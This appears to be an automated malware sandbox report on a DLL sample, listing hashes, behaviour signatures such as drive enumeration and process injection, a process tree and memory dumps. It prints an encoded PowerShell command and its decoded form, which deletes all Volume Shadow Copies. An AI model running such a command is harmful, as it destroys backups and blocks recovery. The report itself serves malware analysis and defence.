Analysis
- max time kernel: 117s
- max time network: 137s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 24-01-2022 00:57
Static task: static1
Behavioral task: behavioral1
- Sample: d6a0b7812b3ee8fbf81d40db94094facc25645689f4109e5d7983e8cb49990ec.dll
- Resource: win7-en-20211208
Behavioral task: behavioral2
- Sample: d6a0b7812b3ee8fbf81d40db94094facc25645689f4109e5d7983e8cb49990ec.dll
- Resource: win10-en-20211208
General
- Target: d6a0b7812b3ee8fbf81d40db94094facc25645689f4109e5d7983e8cb49990ec.dll
- Size: 164KB
- MD5: c37804708ee284575f87bd0e365be9d9
- SHA1: 7b8f73cd90e344db7a4697fb6731cd953b1dfe03
- SHA256: d6a0b7812b3ee8fbf81d40db94094facc25645689f4109e5d7983e8cb49990ec
- SHA512: f2cca7e4bad7d683d47e5fc7fabb79024a8d5932b2b0206b11e66a2cae52d4e50626d3f0494cc3709885e1e40985295dee0eb02e7e44e7dfbb3b6fa7b30e4427
Malware Config
Signatures
- Enumerates connected drives (3 TTPs, 24 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes: rundll32.exe

  | description | ioc | process |
  | --- | --- | --- |
  | File opened (read-only) | \??\P: | rundll32.exe |
  | File opened (read-only) | \??\R: | rundll32.exe |
  | File opened (read-only) | \??\S: | rundll32.exe |
  | File opened (read-only) | \??\X: | rundll32.exe |
  | File opened (read-only) | \??\Z: | rundll32.exe |
  | File opened (read-only) | \??\O: | rundll32.exe |
  | File opened (read-only) | \??\H: | rundll32.exe |
  | File opened (read-only) | \??\I: | rundll32.exe |
  | File opened (read-only) | \??\J: | rundll32.exe |
  | File opened (read-only) | \??\F: | rundll32.exe |
  | File opened (read-only) | \??\E: | rundll32.exe |
  | File opened (read-only) | \??\G: | rundll32.exe |
  | File opened (read-only) | \??\K: | rundll32.exe |
  | File opened (read-only) | \??\N: | rundll32.exe |
  | File opened (read-only) | \??\Q: | rundll32.exe |
  | File opened (read-only) | \??\V: | rundll32.exe |
  | File opened (read-only) | \??\W: | rundll32.exe |
  | File opened (read-only) | \??\B: | rundll32.exe |
  | File opened (read-only) | \??\Y: | rundll32.exe |
  | File opened (read-only) | \??\L: | rundll32.exe |
  | File opened (read-only) | \??\M: | rundll32.exe |
  | File opened (read-only) | \??\T: | rundll32.exe |
  | File opened (read-only) | \??\U: | rundll32.exe |
  | File opened (read-only) | \??\A: | rundll32.exe |
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes: rundll32.exe, powershell.exe

  | pid | process |
  | --- | --- |
  | 1632 | rundll32.exe |
  | 268 | powershell.exe |
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes: powershell.exe, vssvc.exe

  | description | pid | process |
  | --- | --- | --- |
  | Token: SeDebugPrivilege | 268 | powershell.exe |
  | Token: SeBackupPrivilege | 804 | vssvc.exe |
  | Token: SeRestorePrivilege | 804 | vssvc.exe |
  | Token: SeAuditPrivilege | 804 | vssvc.exe |
- Suspicious use of WriteProcessMemory (11 IoCs)
  Processes: rundll32.exe, rundll32.exe

  | description | pid | process | target process |
  | --- | --- | --- | --- |
  | PID 1292 wrote to memory of 1632 | 1292 | rundll32.exe | rundll32.exe |
  | PID 1292 wrote to memory of 1632 | 1292 | rundll32.exe | rundll32.exe |
  | PID 1292 wrote to memory of 1632 | 1292 | rundll32.exe | rundll32.exe |
  | PID 1292 wrote to memory of 1632 | 1292 | rundll32.exe | rundll32.exe |
  | PID 1292 wrote to memory of 1632 | 1292 | rundll32.exe | rundll32.exe |
  | PID 1292 wrote to memory of 1632 | 1292 | rundll32.exe | rundll32.exe |
  | PID 1292 wrote to memory of 1632 | 1292 | rundll32.exe | rundll32.exe |
  | PID 1632 wrote to memory of 268 | 1632 | rundll32.exe | powershell.exe |
  | PID 1632 wrote to memory of 268 | 1632 | rundll32.exe | powershell.exe |
  | PID 1632 wrote to memory of 268 | 1632 | rundll32.exe | powershell.exe |
  | PID 1632 wrote to memory of 268 | 1632 | rundll32.exe | powershell.exe |
Processes
- C:\Windows\system32\rundll32.exe (PID 1292)
  Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\d6a0b7812b3ee8fbf81d40db94094facc25645689f4109e5d7983e8cb49990ec.dll,#1
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\rundll32.exe (PID 1632, child of PID 1292)
    Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\d6a0b7812b3ee8fbf81d40db94094facc25645689f4109e5d7983e8cb49990ec.dll,#1
    - Enumerates connected drives
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 268, child of PID 1632)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (The -e argument is base64-encoded UTF-16LE; it decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, i.e. deletion of all Volume Shadow Copies, which is why vssvc.exe starts and acquires backup/restore privileges below.)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\vssvc.exe (PID 804)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads

| memory dump | filesize |
| --- | --- |
| memory/268-56-0x000007FEFB5B1000-0x000007FEFB5B3000-memory.dmp | 8KB |
| memory/268-57-0x000007FEF2810000-0x000007FEF336D000-memory.dmp | 11.4MB |
| memory/268-58-0x00000000028D0000-0x00000000028D2000-memory.dmp | 8KB |
| memory/268-59-0x00000000028D2000-0x00000000028D4000-memory.dmp | 8KB |
| memory/268-60-0x00000000028D4000-0x00000000028D7000-memory.dmp | 12KB |
| memory/268-61-0x00000000028DB000-0x00000000028FA000-memory.dmp | 124KB |
| memory/1632-55-0x0000000075AB1000-0x0000000075AB3000-memory.dmp | 8KB |